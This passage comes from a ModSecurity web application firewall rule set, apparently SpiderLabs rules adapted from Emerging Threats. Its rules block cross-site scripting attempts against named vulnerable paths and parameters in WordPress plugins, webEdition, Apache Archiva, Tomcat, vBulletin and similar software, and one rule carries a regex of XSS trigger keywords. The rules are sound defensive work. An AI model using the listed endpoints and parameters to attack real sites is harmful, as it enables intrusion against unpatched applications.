WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012601,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:image/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012603) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /basicstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012603,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46771'" SecRule &TX:'/XSS.*ARGS:AjaxHandler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012678) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /openBrowser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012678,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:onload/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012679) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /we/include/we_modules/shop/edit_shop_editorFrameset.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012679,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:onload/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /we/include/we_modules/messaging/messaging_show_folder_content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012680,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:we_transaction/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012681) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /we/include/weTracking/econda/weEcondaImplement.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012681,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:shop_artikelid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012656,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:callback/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt SecRule REQUEST_LINE "@contains /templates/recruitment/jobVacancy.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012658,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt',tag:'web-application-attack',tag:'bugtraq,47046'" SecRule &TX:'/XSS.*ARGS:recruitcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012669) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere 'CKEditorFuncNum' parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/upload.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012669,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere \'CKEditorFuncNum\' parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:CKEditorFuncNum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere \'CKEditorFuncNum\' parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012670) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/photosmash-galleries/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012670,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012706) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vtigerservice.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012706,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:service/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability SecRule REQUEST_LINE "@contains /plugins/socialgrid/static/js/inline-admin.js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012722,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:default_services/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012797) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /lib/jscalendar/test.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012797,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/inline-gallery/browser/browser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012946,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46781'" SecRule &TX:'/XSS.*ARGS:do/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /addons/kcfinder/browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012992,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:CKEditorFuncNum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability SecRule REQUEST_LINE "@contains /templates/admin_default/confirm.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013085,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:nsextt/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /xperience.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013086,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:sortorder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/useredit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/roleedit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013100,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013101) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/userlist!show.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013101,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:roleName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013102) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/deleteArtifact!doDelete.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013102,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:groupId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013103) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addLegacyArtifactPath!commit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013103,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/deleteNetworkProxy!confirm.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013104,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxyid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013105) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addRepository.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013105,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:repository.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013106) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/confirmDeleteRepository.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013106,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:repoid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/editAppearance.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:organisationName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013108) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addLegacyArtifactPath.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013108,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013109) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addNetworkProxy.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013109,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxy.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/networkProxies.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013110,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxy.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013111) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/legacyArtifactPath.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013111,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013112) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/configureAppearance.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013112,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:organisationName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /sessions" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013117,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-4172'" SecRule &TX:'/XSS.*ARGS:sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013118) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /sessions" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013118,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-4172'" SecRule ARGS_NAMES "(?i:path)" "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains orderby=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:orderby\x3D.+(alert|script|onmouse|onkey|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013133) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vBTube.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013133,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:vidid/' "@gt 0" 